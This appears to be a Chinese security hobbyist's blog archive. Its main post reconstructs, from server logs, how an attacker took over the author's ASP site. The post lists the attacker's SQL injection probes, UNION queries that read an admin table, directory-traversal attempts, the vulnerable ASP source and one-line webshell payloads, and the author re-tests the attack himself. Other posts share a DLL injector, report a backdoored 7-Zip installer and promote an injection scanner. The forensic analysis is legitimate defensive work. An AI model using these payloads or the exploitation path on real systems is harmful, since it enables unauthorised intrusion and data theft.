金刀客博客

祝兄弟们2012新年快乐

daokers@qq.com(admin) — Sun,22 Jan 2012 16:41:17 +0800

祝愿所有的兄弟们新年快乐，平平安安的，快快乐乐的度过2012年！

看到很多朋友要求加群，我公布一个，欢迎大家来吹水！QQ群:182314207

daokers

VB DLL Injector v1.0

daokers@qq.com(admin) — Sun,04 Dec 2011 19:26:15 +0800

这段时间玩dll，扫到个vb的dll injector，发来和童鞋们共享，有时间可以改进改进。

发来源代码共享之，

点击下载此文件

vb IDE 0x11003900错误

daokers@qq.com(admin) — Wed,02 Nov 2011 11:12:26 +0800

最近这个vb IDE总是0x11003900错误，弄得我很郁闷，今天好好找了下原因。

原来是amicforvb和IDE响应鼠标插件冲突导致，amicforvb本来就有响应鼠标滚动的功能，我再添加一个相同功能插件，不打架才怪！！

今天在天空软件园遇到一个带sethc后门的软件

daokers@qq.com(admin) — Sun,16 Oct 2011 01:46:35 +0800

今天想制作个自己用的皮肤，要打开ssf文件，于是去下一个7-zip，百度一搜，天空软件园多半都是排列的很前的。地址是http://www.skycn.com/soft/3404.html，7-Zip 9.21 多语言版。

下载下来安装，就觉得奇怪，运行什么taskkill.exe /im FreeHostKillexe.exe /f，一会更奇怪了，修改系统的ifso的值了，再过一会，系统文件保护提示系统文件被替换了，nnd，真是个后门。

劫持sethc，自己改名sothc.exe，放在system32。

看下天空的下载情况

顶得人还不少。

幸好，是个sethc后门，如果是个木马病毒，那就惨罗。如果搞个发信，那服务器应当也是潮水般的涌来？

根据日志逆向分析攻击者入侵思路及查找0day

daokers@qq.com(admin) — Tue,11 Oct 2011 20:44:58 +0800

分析感悟：能够在系统权限下做好的事情就尽量在系统搞定，实在不行的，再从其它防御方案来解决。
详细过程：
攻击者对我服务器的4个网站进行了大量的检测，最后决定把目标选为www.target.org。之后开始寻找注入点，时间大约是从2010-06-06 17:01:13左右开始，先后测试了这些带有参数的网址
dc/toupiao.asp B1=投票&B2=结果' and '7'='7
XXLR1.ASP?ID=560 and 7=2
FLMEN.ASP MENUID=2265 and 7=7
flmen.asp menuid=2265&menujb=2 and 7=2
flmen.asp menuid=2265&menujb=2' and '7'='7
find.asp LR=!S!WCRTESTINPUT000000!E!&B1=提交&MENU=全部栏目' and '7'='7
find.asp B1=提交&MENU=全部栏目&LR=!S!WCRTESTINPUT000000!E!' and '7'='7
dc/toupiao.asp B1=投票&B2=结果' and '7'='2
/flmen.asp menuid=2265 and 7=7
ztlm.asp lb=南岭风光' and '7'='2
find.asp B1=提交&MENU=全部栏目&LR=!S!WCRTESTINPUT000000!E!' and '7'='2
find.asp LR=!S!WCRTESTINPUT000000!E!&B1=提交&MENU=99999999 or 7=7
这里有一个测试方法，攻击者很聪明，他使用非数字来测试id值
 http://www.target.org/xxlrimg.asp?tab=&menuid=2a283
结果出现问题

之后进一步用逗号来测试
 http://www.target.org//xxlrimg.asp tab=&menuid=2283'
这次被网站系统过滤掉了

跳转到首页
 http://www.target.org /index.asp LR=/xxlrimg.asp在参数menuid中有非法URL2283’
继续追寻注入点，同样用非数字测试id
http://www.target.org/XXLR1.ASP?ID=8a3

已经看到注入的希望，但是这次吸取教训，不再以逗号测试。

接下来，他找到了这个网站的资料下载栏目，http://www.target.org//manger/Login.asp，直接给我爆出错误
攻击者是这样测试的，将用户名用特殊字符测试，比如_'123123''

直接爆80040e14错误

攻击者继续转换目标
/system/user/userlogin.asp
/system/user/login.asp
/system/user/login1.asp
但是之后继续来到资料下载这里测试
这次把用户名换成了_'admin''，同时进行了union测试，句法如下
_'UserName_=_''_and_exists_(select_username_from_[admin])''_
就是在用户名中直接插sql语句。
之后来了一次get测试
/manger/Login.asp UserName=123'&PassWord=123&GetCode=0568&Submit.x=0&Submit.y=0
突然出现大量的对/manger/Login.asp的访问，不知道是不是暴力猜解

与此同时另外一个日志出现，范围内容为
/ever.asp lr=%C4%FA%C3%BB%D3%D0%D7%A2%B2%E1%B3%C9%B1%BE%D5%BE%D3%C3%BB%A7,%BB%F2%C3%BB%D3%D0%B5%C7%C2%BC,%B2%BB%C4%DC%CA%B9%D3%C3%B4%CB%B9%A6%C4%DC
解密下
ever.asp？lr=您没有注册成本站用户,或没有登录,不能使用此功能

但是我们继续关注114.237.161.118的行为
仍然在变换sql语句猜解中
_'UserName_=_''_and_exists_(select_username_from_[admin])_where_''='''_
'UserName_=_'123_and_exists_(select_username_from_[admin])_where_''='''_
_'UserName_=_'123'_and_exists_(select_username_from_[admin])_where_''=''_
_'UserName_=_'123'_and_exists_(select_username_from_[admin])_where_'1'='1''_
_'UserName_=_'123'_and_exists_(select_username_from_[admin])_where_'1'='1'''_
_'UserName_=_'123'_and_exists_(select_username_from_[admin])''_
多次无果之后继续回到登陆目录
/system/user/userlogin.asp
测试2次之后，开始放弃手工。开始收到大量的扫描日志。
从日志看，如果没有猜错的话，应当是WWWSCAN。并且将目标定为system目录。
在大量的扫描日志中，同时夹杂着攻击者手动游览的日志，非常让人郁闷。但是我找到了一些让人很是蛋疼的地址。
http://www.target.org/system/sysupfile/up2.asp
http://www.target.org/system/selectimg.asp?lb=&id=&dateid=6022999.99978859?id=541
http://www.target.org /system/selectimg1.asp
http://www.target.org /system/sysupfile/dispfile.asp fitype=3&pagesn=&fiex=&upuser=
这些日志应当不是扫描器的结果，那么有可能是攻击者下载了相同系统的源码，来测试。
后面这个地址让人郁闷，竟然可以直接列出目录中的图片，没有任何权限检测。

真是mjj的网站系统，
心想这个游览也就是看看图片罢了，但是慢慢的开始担心起来。我看到了试图跨目录的尝试，他是这样尝试的
/system/sysupfile/dispfile.asp?fitype=3&pagesn=1&fiex=../&upuser=
/system/sysupfile/dispfile.asp fitype=3&pagesn=1&fiex=../..&upuser=
/system/sysupfile/dispfile.asp fitype=3&pagesn=1&fiex=/..&upuser=
/system/sysupfile/dispfile.asp fitype=3&pagesn=1&fiex=/../&upuser=
/data_file.asp?webid=&id=&dateid=6345000.00025146
但是似乎并没有什么发现。开始转移到其它页面,突然发现，一个insertimg日志
 http://www.target.org/system/insertimg.asp?dateid=6345000.00025146?id=545
打开看了一下，蛋疼的很

又是没权限检测的。继续往下看，找到了上传地址
 http://www.target.org/system/sysupfile/up1.asp
这个好像有session检查，攻击者进行了注入尝试
/system/insertimg.asp dateid=6345000.00025146?id=545'
他同时找到了另外一个上传点
/system/sysupfile/up2.asp
但是似乎都没有利用的地方，他重新杀回登陆页面。找到多个重要的路径。
/system/user/login1.asp
/SYSTEM/USER/FRIEND.ASP

爆出了一个很重要的目录setup，此时已经差不多到了17:47:02，尝试进行了47分钟左右。
/db/fileupimg2.asp
/db/WEBDEL.ASP
/system/upimg5
/system/webfilelist.ASP?MENUID=2292&menujb=3 文章管理页面

接下来，攻击者找到这样一个页面
/dc/setup.asp
/dc/setup1.asp
爆出没有权限
 http://www.target.org/dc/modi.asp
http://www.target.org/dc/modi.asp?id=1
http://www.target.org/dc/modi1.asp

继续往下翻，终于我看到了“/system/管理信息”之类的中文信息的路径，我知道，扫描日志终于要完了。
攻击者还在查找注入
/dc/modi.asp id=1'
/dc1/modi.asp?id=1'
/dc1/modi1.asp
从日志看，攻击者又回到了图库这里
/system/selectimg.asp?lb=&id=&dateid=6022999.99978859?id=541
/system/selectimg1.asp?filetype=
/system/data.asp?id=1
/system/sysupfile/dispfile.asp?fitype=
/system/ADDfile1.asp
接下来出现
/dc/webdc.asp写入文件失败的情况
/upfile/dark2.asp
此时说明，小马已经上来了。
进行了多次的id的尝试
/dc/modi.asp?id=39
/dc/webdc.asp?goaction=qbh
我有一种疑惑，是他传上来了shell？还是想测试这个是不是马？从格式看，可能是darkblood的。
还在继续猜测
/system/webedit.asp?id=1
/system/webedit.asp id=1'
看了只是想试试webdc是不是shell
/system/webedit.asp?id=123
/system/webedit.asp?id=123a
/system/webedit.asp id=123'
/system/webedit1.asp id=123a
/system/file_laiyuan1.asp

经过无数次尝试之后又回到了开始上传的那里
/system/sysupfile/up1.asp
/system/sysupfile/up2.asp
擦，竟然知道数据库的绝对路径，蛋疼，越来越看不懂了
之后确定用
 http://www.target.org/dc1/modi.asp?id=1
这个注入点才进行操作,试图读取文件和列目录
/dc1/modi.asp%20id=1%20union%20select%20username,password,3,4%20from%20admin%20in%20%22*://wwwroot/systemdb/%23%23%23%23userdb.asp%22%20where%20id=1

继续看日志，看到另外一个让我无语的地址
/system/user/bbssetup.asp

攻击者针对这个地址进行了大量的测试，之后开始转移到/guestbook这个目录来进行测试
/guestbook/search.asp
/guestbook/login.asp

再之后，让我迷惑不解，
出现了a.asp的访问
我打开一看，竟然是我的那个上传小马，还有另外一个上传小马/shellcode.asp;jpg
让我更加迷惑的时这个文件似乎不是114.237.129.237上传的，因为他尝试了好多次的密码
/shellcode.asp;jpg?goaction=123
/shellcode.asp;jpg?action=123
/shellcode.asp;jpg?action=123
/shellcode.asp;jpg?g=1234
/shellcode.asp;jpg?s=123
/shellcode.asp;jpg?a=123
/shellcode.asp;jpg?pass=123
后来查看文件日期和自己的博客日志，猛然想起来，这几个shell极可能是自己当初测试时上传没有删除，查看了其中一个shell的密码，竟然是自己曾经用过的密码md5，蛋疼。让我迷惑的事情来了，114.237.129.237是怎么知道这个文件，他可以列出当前网站的目录？ca
Systemdb/dark2.asp是确确实实存在的，这个肯定不是我上传，攻击者应当拿到了一句话后门。
并且他试图列出c:\windows和E盘中的文件，至少修改了2个文件，分别为
Systemdb/dark2.asp和dc/webdc.asp，Systemdb是数据库目录，具有写入的权限，但是无脚本权限，所以这个大马应当是没有作用。dc/webdc.asp是一个access数据库，能够写入，也有权限，但是这个目录是没有写入权限的，奇怪的是现在这个webdc.asp用记事本打开竟然全部为空，被清空了。现在攻击者的权限应当是拿到了一句话，并且可以列目录。并且，如果我没有猜错的话，他的一句话地址就是dc/webdc.asp。拿到一句话之后曾经想写入文件dc\wsi.asp。同时结合拦截日志，我知道是通过dc/modi1.asp写入，我查看dc/modi1.asp的源文件，他包含的有一个filetou.asp，而这个文件就是打开access数据库webdc.asp的文件。基于这个想法，我继续查看日志。我搜索dc/modi1.asp的相关访问记录，果然发现了踪迹
“/dc/webdc.asp |69|800a000d|类型不匹配:_'execute'”.mjj的，已经被写入一句话了，查看周边记录。
到现在我明白过来了，我说怎么有那么多的dc/modi.asp，dc/modi1.asp和dc/webdc.asp的访问记录呢。同时我突然想起来，上次小k弄这个站的时候是社工到了后台密码，好像也是在这个目录拿的shell。既然是这样的话，那么应当存在一个没有管理员验证就可以对数据库进行操作的页面。
查看/dc/modi1.asp的源码
<%@ LANGUAGE = VBScript.Encode %>

<%
id=session("webdcid")
name=request.form("name")
sql="Select *  FROM dc  where id="&id
set rs=server.createobject("ADODB.Recordset")
rs.Open sql,conn, 1, 3
rs("name")=name
rs.update
rs.close
set conn=nothing
session("webdcid")=""
response.redirect  "setup.asp"
%>
看到rs.update，不得不说蛋疼，有一点确信当初的想法了。心想这个name该怎么输入值呢？

由于也有大量的dc/modi.asp的访问记录，我查看了下dc/modi.asp的代码

<%
id=request("id")
dim rs
sql="Select *  FROM dc  where id="&id
set rs=server.createobject("ADODB.Recordset")
rs.Open sql,conn, 1, 3
session("webdcid")=id
%>

New Page 1

<%rs.close
set conn=nothing
%>
一切都明白了，他的action对象就是modi1.asp，从过这个页面的form将一句话木马写入到数据库中。
既然这样，那么我也测试一下
由于是access数据库，并且没有拦截，所以我想应当是UNICODE码的加密一句话，由于数据库被搞坏，我重新传一个测试下。在这里得说一下，检测没问题，但是别毁坏别人的数据库。
传好数据库后，我们打开http://www.target.org/dc/modi.asp?id=43

插入加密的一句话。之后打开数据库查看是否成功。

已经被成功插入了一句话，
用菜刀连接下看看

成功列出了目录。说明入侵的思路确实是这样！问题找到了，那么思路也就清晰了。继续分析日志
攻击者总共插入数据库2次。
2010-06-06 18:16:55 222.73.167.44 GET /dc/webdc.asp.这条日志就是第一次检查是否插入成功的日志，由于第一次数据库没有损坏，/dc/modi.asp?id=1直接就能访问了，之后想写入大马，由于没有权限出现多次写入文件失败日志“/dc/webdc.asp |0|800a0bbc|写入文件失败。” 再到后来，开始列目录，查找可以上传文件的地方，最后在数据库目录/systemdb/写下dark2.asp，并尝试/systemdb/dark2.asp?goaction=qbh这样登陆，没有权限，清空内容，替换为test。这也就是这个文件的由来。之后上传了/upfile/dark2.asp，但是没有脚本权限，删除之。
   在第一次插入数据库成功后，就尝试建立dc\wsi.asp，但是没有成功，之后尝试列出c：\windows和c:\windows\system32，但是都没有成功。同时尝试列出了e潘，e盘是cd，我无设置权限。
之后不知道为什么，可能插入数据库出现了错误，同时数据库被插坏了。/dc/modi.asp?id=1已经不能正常访问，如是出现了下图的情况，多次尝试试图找出正确的id值。

我说奇怪呢，怎么老是测试这个id，原来是为了找到一个正确的id值，然后插入一句话。不得不说，攻击者对这代码还真熟悉，我都从来没看过。从日志可以看到当id为43时，终于正确了。插入成功后用菜刀进行了连接，之后他想把这个webdc.asp替换成大马。由于找不到写入的目录，而写入的目录又没有权限，所以他不得不想办法把数据库webdc.asp替换成大马。他多次尝试这样登陆
/dc/webdc.asp?goaction=qbh
/dc/webdc.asp?goaction=login
再之后他重新开始寻找其他漏洞，继续测试了大量注入点和后台文件。再到后面，还是来到了/dc1/modi.asp这里，让我郁闷的是，他竟然猜表

就这样一直在折腾，寻找敏感文件，尝试传大马的机会。
一直到2010-06-06 20:10:42左右，最后确认了一次dc/webdc.asp没问题。如果没有猜错的话，攻击者应当吃晚饭去了。
分享到这里的时候，我查看另一份拦截日志，发现这个时间怎么都对不上。仔细查看我才明白，iis的时间我没有设置为系统时间，而是格林尼治标准时间，也就是说比北京时间慢了8个小时。这样看了原来攻击者是从2010-06-06 17:01:13加上8个小时，那么就应当是6月7日的1点多开始的了，当然最后也不是晚饭了，应当是睡觉去了，这也才符合夜猫子的行动习惯。
     那么结合我的另外一份日志，可以清晰的看到。攻击者在插入数据库时测试了这么几种一句话
<% eval request ( ) %>
< script language = vbscript runat = server > execute request ( ) < /script >
<% execute request ( ) %>
这些都被拦截了，那么他测试成功的一句话是什么呢？肯定是加密的ASCII一句话。
在2010-06-07 02:51:55左右，攻击者开始重新开始测试，他尝试了几次union，这也导致他不得不更换ip。
http://www.target.org/dc1/modi.asp?id=1%20union%20select%20username,password,3,4%20from%20admin%20in%20"D:\website\target\wwwroot\systemdb\%23%23%23%23userdb.asp"%20where%20id=1
http://www.target.org/dc1/modi.asp?id=1%20union%20select%201,2,3,4%20from%20admin%20in%20"D:\website\target\wwwroot\systemdb\%23%23%23%23userdb.asp"%20where%20id=1
郁闷，用一句话获得了数据库的物理地址，并且尝试注入，蛋疼。由于注入是会被封ip的，所以攻击者不得不重启hub，重新获取ip，那么他的ip变化为
114.237.161.118
114.237.130.191
114.237.130.14
114.237.128.98
114.237.130.110
此次注入之后ip换为114.237.129.237。一阵测试后，最后在4点10左右，结束整个测试。
现在对攻击者的整个攻击思路进行一下总结。整个攻击从6月7日的1点多开始，在4点10左右停止，整个过程持续了4个小时左右，战果是拿下了一句话后门。首先是探路，测试了本服务器的4个网站，最后选定www.target.org这个站点，决定从这个站点下手。选定站点之后，首先测试页面可能存在的注入点，测试了多个带有参数的页面。觉得希望不大之后开始运行wwwscan扫描站点系统。同时下载了同站点系统进行研究，之后测试各个可能存在问题的页面，最后在一个页面中找到了可以插入一句话的漏洞，之后插入一句话，再之后尝试扩大成果，想传大马，但是没有成功。整个IIS的分析也就在此结束了。分享到这里我突然有一个想法，这个测试者会不会是刀城的刀友呢？搜搜看。
以114.237开头的会员有2位。

能有这种机会，在一个ip段的机会是微乎其微的。我初步认为是bbt4ng，或者是他的朋友至少离他不远！

后来找他聊了一下，果然是的。

此文已发表在土司论坛！

如需转载请表明出处和作者！

黑客们，也来看看《焦点访谈》吧

daokers@qq.com(admin) — Tue,22 Feb 2011 20:55:17 +0800

文章末尾的这个视频是中央电视台在2011年2月21日的焦点访谈节目。看了中央电视台的这个焦点访谈“网络扫“黑”保安全”，看看这些毛头小孩干的事情，祸害匪浅啊。其实在某种意义上来说，这些人不能算作黑客，他们是以非法手段来谋求钱财，最多算的上黑客界的不法之徒而已，他们在安全方面的贡献应当是微乎其微，所以不能称之为黑客。黑客在于找出技术问题、系统漏洞，解决问题、修补漏洞，促进网络环境的良好发展，为了整个网络的安全做出了非常人所能理解的辛苦和劳动，最多也就是显耀一下自己的技术，以黑客技术来谋求钱财应当是违背黑客的原始定义的。从片中看了，央视记者也没有好好理解“黑客”到底为何物，可能就是因为他带“黑”吧，谁叫hacker读起来就是“黑”呢，在这里一定要为这个名词平反，黑客不黑，骇客才坏。

安全与攻击向来不分家，也无法分家。如果不懂得攻击，怎么做好防卫安全呢？跟古代攻城和守城一个道理，不了解箭的锋利，哪有坚固如铁的盾牌。在过去不到一年的时间里，国内各个比较有名望的安全论坛基本全军覆灭，黑基论坛，小熊论坛，暗组论坛，饭客论坛，红客论坛，黑白论坛等等技术氛围相对较好的论坛通通倒下，前几天仅存的以“低调求发展”为座右铭的土司也圆寂归天。看国家这个整治的势头，整个中国安全技术的发展停滞10年看来是不可避免的了。黑客们，看好你的手指哦，也该反思了。

说到国内的黑客论坛的整治，我不由想起国外的黑客论坛，在国外的黑客论坛上，ddos工具，远控工具，盗icq的工具，注入扫描方面的程序，不管开源代码还是编译好的程序都是应有竟有，不知道他们是如何做好监管的，难道他们就没有我们国内的情况？在国外top100的黑客网站排名上还没有听说哪家网站被人为强制关闭了。缘何我们国内的情况就如此严重呢？发人深思！

黑客网站负责人王献冰（孤独剑客）因培训黑客技术入狱

daokers@qq.com(admin) — Sat,12 Feb 2011 22:40:28 +0800

今年35周岁的王某可能做梦也没想到，曾是一代黑客佼佼者的自己，会在铁窗内度过自己2011年的新年。　

　　2003年5月，王某凭借自己对计算机网络的热爱，成为黑客程序界的高手，成功创建了网址为www.hackbase.com的黑基网，在网站上开展黑客软件的共享，探讨一些技巧。2009年，王某以黑基网为平台，在北京市海淀区成立了黑基公司，自任法人，同时招聘了一批曾在网络安全公司或大型杀毒软件公司供职、具备较高计算机技术，在黑客圈内有一定知名度的人担任网站顾问、专职讲师等。黑基公司的收入来源主要是通过提供网络培训及软件下载等收取会员费用。据调查，其中70%的会员入会意图就是学习黑客技术。该公司曾开办了一期实地面授班，缴费学员为12人，每人9800元，培训内容为网络安全及黑客技术。至案发时黑基公司通过上述方式获利高达20余万元。　

　　黑基公司的行为不久即纳入公安机关的侦查视线，经过长达1年的侦查，公安机关最终掌握了该网站服务器群所在地以及黑基公司传授黑客技术、出售黑客工具的具体事实。经北京市网络安全保卫处远程勘验及侦查，查证在黑基网的VIP会员下载区，网站提供黑基 2009全能工具箱以及ASP木马数字免杀器、网马新世界2006.exe、明小子Domain3.6增强纯净版.exe、HDSI2.2.exe、 My-Browser.exe、Pangolin.exe、Smsniff.exe、1433连接器.exe、挖掘鸡6.5.exe、 WSIv5.1.25.exe、WebCruiser-CN.exe等下载程序及工具。而国家计算机网络应急技术处理协调中心、国家计算机病毒应急处理中心计算机病毒防治产品检验实验室等国家权威部门以及大型网络安全公司的相关鉴定均认为上述程序、工具分别为网站挂马工具、网站注入工具、攻击目标搜寻工具、网络嗅探工具、漏洞扫描工具、数据库入侵工具等，均属于危害性较大的网站侵入、控制工具。嫌疑人王某等人随即落网，涉嫌罪名是提供侵入、控制计算机系统程序、工具罪。　

　　该罪属于刑法修正案(七)规定的新罪名，系在刑法原第二百八十五条增加的第三款，具体为:“提供专门用于侵入、非法控制计算机信息系统的程序、工具，或者明知他人实施侵入、非法控制计算机信息系统的违法犯罪行为而为其提供程序、工具，情节严重的，依照前款规定处罚。”该罪的犯罪主体是一般主体，单位不构成本罪。主观方面是故意，但行为人是否为营利的目的提供程序、工具并不影响犯罪的成立。其犯罪客体是国家计算机信息网络的安全。须明确的是，这里的犯罪对象分为两大类，第一类是“专门”用于侵入、非法控制计算机信息系统的程序、工具，这是从其功能用途来区分的，也就意味着这类程序工具毫无合法用途的可能性，只能用于非法侵入、非法控制计算机信息系统。第二类是从其功能用途来看可能不是专门用于非法侵入、控制计算机信息系统的程序和工具，但也具有能实现前述违法犯罪目的的计算机程序和工具，行为人明知使用者获取这些程序或工具的目的就是为了实施非法侵入控制他人计算机信息系统，仍然为其提供该类程序和工具。此时，这类程序和工具就成为本罪的犯罪对象。从某种意义上说，第二类程序和工具可视为有双用途的信息安全设备，只有在与其他构成要件相结合时才能成为本罪的犯罪对象。就行为人提供的上述程序、工具而言，首先是行为人只要提供程序或者工具，二者择一即可构成犯罪。其次，提供的程序和工具也不需要同时具备侵入和非法控制两种功能，二者也是择一即可构成本罪对象。　

　　需要注意的是，刑法修正案(七)第九条增订的刑法第二百八十五条第三款规定“依照前面的规定处罚”，而前面的规定为“犯本罪的，处三年以下有期徒刑或者拘役，并处或者单处罚金;情节特别严重的，处三年以上七年以下有期徒刑，并处罚金”。因此，本罪属于情节犯，即实施了上述客观行为之后，还需达到情节严重的标准方可入罪，能否认定嫌疑人的行为达到“情节严重”是区别其罪与非罪的关键所在，但这里的情节严重有待司法解释予以明确规定。但主流观点认为，行为人提供前述犯罪对象的目的、动机、主观恶性、提供的数量、犯罪对象的功能作用等都可以成为评价是否构成严重情节的因素。本案王某创建的黑客网站不但提供网站侵入、控制工具，还大规模培训黑客技术，实属情节严重，应予严惩。(作者单位:北京市海淀区人民检察院)

“侵入”广州新一代机房

daokers@qq.com(admin) — Mon,03 Jan 2011 18:15:43 +0800

无意之中，“侵入”了广州新一代机房

这次总共托管了3台服务器，2个磁盘柜，每个磁盘柜都是满员的12个500g硬盘，去除热备的磁盘，2个磁盘柜的总容量达到了10T左右。3台服务器有一台作为数据库服务器，另外2台服务器做一个网络均衡负载处理，以响应更多同时访问请求，尽量避免当机的情况下网站的正常运转，同时又可做数据的双重备份。

新一代机房全系黑色机柜，满屋子都是服务器在嗡嗡名叫。

服务器和磁盘柜，占去了差不多一整个架，用的思科的8口路由器，已经完全满足要求了。

双内网架构，便于数据的备份与安全。RAID构建大容量服务器，同时热备搭配，即使某一个硬盘出现问题也不会造成数据丢失。

关于firefox游览器中旁注查询插件Host Spy的使用的更正

daokers@qq.com(admin) — Sat,25 Dec 2010 00:36:05 +0800

今天上Q，joe给我消息说编辑那个hostspy.jar不必用c32asm修改，直接解压缩，然后用winrar压缩就行，不过压缩的时候需要用zip模式，而不能是rar模式。

测试了一下，确实如此。

另外那个插件c段查询的用3est的那个已经不行了，好像没有接口。用这个吧http://ip.chaxun.la，好像数据还行。

have a enjoy

daokers

2010年12月24日夜

Safe3 Web蜘蛛爬行漏洞扫描系统 6.1修正版

daokers@qq.com(admin) — Sat,04 Dec 2010 20:53:40 +0800

今日得一safe兄的大杀器-Safe3 Web蜘蛛爬行漏洞扫描系统 6.1修正版，功能非常强大，在这里给大家推荐一下。不过这个是试用版，只能扫描sql注入，但是对于安全工作者来说，这不是已经完全满足了吗？

软件介绍：
SQL注入网页抓取
网页抓取模块采用广度优先爬虫技术以及网站目录还原技术。广度优先的爬虫技术的不会产生爬虫陷入的问
题，可自定义爬行深度和爬行线程，网站目录还原技术则去除了无关结果，提高抓取效率。并且去掉了参数
重复的注入页面，使得效率和可观性有了很大提高。

SQL注入状态扫描技术
不同于传统的针对错误反馈判断是否存在注入漏洞的方式，而采用状态检测来判断。所谓状态检测，即：针
对某一链接输入不同的参数，通过对网站反馈的结果使用向量比较算法进行比对判断，从而确定该链接是否
为注入点，此方法不依赖于特定的数据库类型、设置以及CGI语言的种类，对于注入点检测全面，不会产生
漏报现象。并且具备一定的绕过IDS检测功能，扫描到隐藏的注入点。

注：爬行速度飞快，平均十分钟可扫描一万网址

软件运行需要Microsoft .NET Framework v2.0

下载地址：Safe3 Web蜘蛛爬行漏洞扫描系统 6.1修正版